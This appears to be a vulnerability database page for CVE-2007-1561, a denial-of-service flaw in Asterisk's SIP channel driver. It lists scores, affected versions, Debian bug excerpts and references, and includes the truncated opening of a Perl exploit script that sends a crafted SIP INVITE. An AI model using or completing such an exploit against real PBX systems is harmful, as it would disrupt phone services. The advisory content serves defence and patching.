Published: 21/03/2007 Updated: 16/10/2018

CVSS v2 Base Score: 7.8 | Impact Score: 6.9 | Exploitability Score: 10

VMScore: 785

Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

The channel driver in Asterisk prior to 1.2.17 and 1.4.x prior to 1.4.2 allows remote malicious users to cause a denial of service (crash) via a SIP INVITE message with an SDP containing one valid and one invalid IP address.

Vulnerable Product	Search on Vulmon	Subscribe to Product
asterisk asterisk 1.2.15
asterisk asterisk 1.2.16
asterisk asterisk 1.4.1
asterisk asterisk 1.2.14

Debian Bug report logs - #419820 CVE-2007-1594: Asterisk segfaults upon receipt of a certain SIP packet (SIP Response code 0) Package: asterisk; Maintainer for asterisk is Debian VoIP Team <pkg-voip-maintainers@listsaliothdebianorg>; Source for asterisk is src:asterisk (PTS, buildd, popcon) Reported by: Frédéric Brière ...

Debian Bug report logs - #415466 asterisk: SIP INVITE DoS, supposedly fixed in 142 and 1217, which is released today 19/03/2007 Package: asterisk; Maintainer for asterisk is Debian VoIP Team <pkg-voip-maintainers@listsaliothdebianorg>; Source for asterisk is src:asterisk (PTS, buildd, popcon) Reported by: Jeroen Massa ...

Several remote vulnerabilities have been discovered in Asterisk, a free software PBX and telephony toolkit The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-1306 Mu Security discovered that a NULL pointer dereference in the SIP implementation could lead to denial of service CVE-2007-1561 Inr ...

#!/usr/bin/perl # perl asterisk-Invitepl 1921681104 5060 userX 19216812 5060 userY use IO::Socket::INET; die "Usage $0 <dst> <dport> <dusername> <src> <sport> <susername>" unless ($ARGV[5]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=> ...

NVD-CWE-Other http://www.securityfocus.com/bid/23031 http://www.securitytracker.com/id?1017794 http://voipsa.org/pipermail/voipsec_voipsa.org/2007-March/002275.html http://asterisk.org/node/48339 http://www.sineapps.com/news.php?rssid=1707 http://security.gentoo.org/glsa/glsa-200704-01.xml http://secunia.com/advisories/24719 http://www.debian.org/security/2007/dsa-1358 http://www.novell.com/linux/security/advisories/2007_34_asterisk.html http://www.osvdb.org/34479 http://secunia.com/advisories/25582 http://secunia.com/advisories/24564 http://www.vupen.com/english/advisories/2007/1039 http://marc.info/?l=full-disclosure&m=117432783011737&w=2 https://exchange.xforce.ibmcloud.com/vulnerabilities/33068 http://www.securityfocus.com/archive/1/463434/100/0/threaded https://nvd.nist.gov https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=419820 https://www.exploit-db.com/exploits/3566/https://www.debian.org/security/./dsa-1358

CVE-2007-1561

Vulnerability Summary

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect